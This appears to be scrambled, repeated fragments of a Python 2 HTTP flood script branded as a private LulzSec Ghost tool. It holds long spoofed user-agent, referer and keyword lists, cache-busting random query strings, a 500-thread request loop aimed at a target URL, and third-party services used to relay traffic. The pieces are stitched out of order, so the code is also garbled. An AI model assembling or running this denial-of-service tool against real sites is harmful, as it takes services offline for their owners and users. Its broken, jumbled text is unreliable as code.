headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial", "www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484", "# generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U;", ")') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24')", "acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x')", "like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3)", "X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22", "`. // // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~", "headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06", "headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de')", "A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)')", "`'-'--'----'---------' | | : O ._O O_. O ._O O_. ; ; :", "en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko)", "headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22')", "headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows", "request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents))", "headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better", "(Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", ") /|-._: : | \\ \\ / / :_| ;`-._; __..--'; : :", "(Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0", "en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1", ".NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')", "sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try:", "http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko)", "armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610')", "Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G", "6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36", "def set_safe(): global safe safe=1 # generates a user agent array def useragent_list():", "en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')", "' : `.`.) _,' |;._:: | | | | `| : `' ,'", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727;", "(Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64')", "(1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS", "XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev')", "keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi')", "headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=')", "else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\":", "2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML,", "Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)')", "China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9;", "PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb;", "5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X", "simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots():", "(safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts requests", "else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\"", "print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe()", "g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux;", "6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64)", "(Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1')", "4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0')", "headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona", "1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", ", \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O O_. O", "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')", "~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else:", "PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0)", "4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags ;", "lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if", "headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec", "libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS", "/ `'-'--'----'---------' | | : O ._O O_. O ._O O_. ; ;", "at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have", "3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619')", "headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0", "headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0')", "headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)')", "headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport')", "headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered", "\"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..'", "// // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _//", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=')", "Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014", "global safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents", "Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U;", "/ | \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ /", "inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2:", "(Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator')", "FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html;", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us;", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list():", "keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370')", "153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1;", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android", "<EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06", "headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')", ":_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | / ' |", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword", "2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2')", "O ._O O_. O ._O O_. ; ; : `. // // //", "Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search')", "| | | | `| : `' ,' `. / |`-:_ ; |", "SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')", "6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "(Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0", "0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)')", "v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot')", "Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus", "Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)')", "headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')", "EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE", ". _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--''", "headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston", "a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0", "run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" %", "CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like", "sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m", "Safari/537.36') # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=')", "headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0", "| | : O ._O O_. O ._O O_. ; ; : `.", "def buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65,", "(Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2", "ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like", "(linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/)", "headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)')", "headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48')", "5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list", "= urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control',", "fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", "= sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url)", "headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0;", "org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build", "O_. O ._O O_. ; ; : `. // // // // ,'", "safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0", "(Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "+ \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500):", "<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh;", "Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", ": / ( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' |", "print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if", "(Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0", "Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0", "MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows;", "NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)", "return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") 